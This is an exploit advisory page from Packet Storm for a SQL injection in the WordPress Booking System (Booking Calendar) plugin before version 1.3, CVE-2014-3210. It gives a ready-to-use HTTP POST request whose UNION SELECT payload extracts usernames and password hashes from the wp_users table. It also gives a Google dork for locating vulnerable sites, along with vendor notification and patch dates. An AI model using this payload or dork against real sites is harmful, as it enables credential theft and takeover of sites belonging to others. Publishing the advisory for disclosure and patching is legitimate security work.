what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Booking System SQL Injection

WordPress Booking System SQL Injection
Posted May 22, 2014
Authored by maodun

WordPress Booking System (Booking Calendar) plugin versions prior to 1.3 suffer from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
advisories | CVE-2014-3210
SHA-256 | 560cfabaaf99cea066648aa76f26ae607e277548fb3dcb5c30e5c6a8952a701f

WordPress Booking System SQL Injection

Change Mirror Download
# Exploit Title: Wordpress Booking System (Booking Calendar) plugin
SQL Injection
# Release Date: 2014-05-21
# Author: maodun
# Contact: Twitter: @conmancm
# Software Link: http://wordpress.org/support/plugin/booking-system
# Affected version: < 1.3
# Google Dork: inurl:/wp-content/plugins/booking-system/
# REF:CVE-2014-3210
-----------------------------------------------------------------------------------------------------------------
# Introduction:
Booking System is great for booking hotel rooms, apartments, houses,
villas, rooms etc, make appointments to doctors, dentists, lawyers,
beauty salons, spas, massage therapists etc or schedule events.
-------------------------------------------------------------------------------------------------------------------------
# SQLi - Proof Of Concept:
vulnerable path:
/wp-content/plugins/booking-system/dopbs-backend-forms.php

vulnerabile parameter:$_POST['booking_form_id']

POC:

POST /wp/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 149
Cookie: [your cookie]

action=dopbs_show_booking_form_fields&booking_form_id=100 union select
1,2,3,4,5,6,7,8,9,hex(concat(user_login,user_pass)) from
wp_users#&language=cr

response:
<input type="hidden" name="booking-form-field-translation-1"
id="booking-form-field-translation-1" value="[hex value here]" />

-------------------------------------------------------------------------------------------------------------------------
# Patch:
-- Vendor was notified on the 2014-05-05
-- Vendor released version 1.3 on 2014-05-06 Fixed the bug
-------------------------------------------------------------------------------------------------------------------------
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close